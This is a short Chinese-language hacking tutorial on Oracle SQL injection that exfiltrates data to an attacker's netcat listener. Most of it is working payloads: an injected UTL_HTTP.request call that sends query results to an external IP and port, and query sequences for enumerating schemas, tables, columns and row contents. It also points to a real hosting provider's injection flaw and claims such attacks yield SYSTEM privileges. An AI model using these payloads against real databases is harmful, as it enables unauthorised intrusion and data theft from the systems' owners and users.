Oracle注射技術——Oracle+nc注射

字號:


    首先外網nc監(jiān)聽對應的端口
    and UTL_HTTP.request('外網ip:port/'||(sql語句))=1--
    爆庫:
    select owner from all_tables where rownum=1
    select owner from all_tables where owner<>'第一個庫名'
    and rownum=1
    select owner from all_tables where owner<>'第一個庫名'
    and owner<>'第二個'and rownum=1
    select owner from all_tables where owner<>'第一個庫名'
    and owner<>'第一個庫名' and rownum=1
    以此論推
    爆表:
    select TABLE_NAME from all_tables where owner='庫名'
    and rownum=1
    select TABLE_NAME from all_tables where owner='庫名'
    and rownum=1 and TABLE_NAME<>'表名1'
    select TABLE_NAME from all_tables where owner='庫名'and rownum=1
    and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'
    以此論推
    爆列:
    select COLUMN_NAME from user_tab_columns where table_name='表名'
    and rownum=1
    select COLUMN_NAME from user_tab_columns where table_name='表名'
    and rownum=1 and COLUMN_NAME<>'第一個爆出的列名'
    select COLUMN_NAME from user_tab_columns where table_name='表名'
    and rownum=1 and COLUMN_NAME<>'第一個爆出的列名' and COLUMN_NAME<>'第二個爆出的列名'
    爆內容:
    第一個內容:select 列名 from 表名 where rownum=1
    第二個內容:select 列名 from 表名 where rownum=1 and 列名<>'第一個值'
    第三個內容:select 列名 from 表名 where rownum=1 and 列名<>'第一個值' and 列名<>'第二個值'
    以此論推
    現在大家轉過頭來看下“萬網的尷尬-萬網ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html
    是不是很明了了...o(∩_∩)o...哈哈
    注:
    1:在windows環(huán)境下,oracle是以服務的形式啟動的,這樣通過web注射就可以直接獲得system權限(此部分內容正在整理測試階段中,以供給大家更直觀、簡潔、有效的參考資料
    2:針對unix和linux操作系統(tǒng)方面對于Oracle也會作出分析,相信Oracle注射將會成為轉入高級Hack入侵的橋梁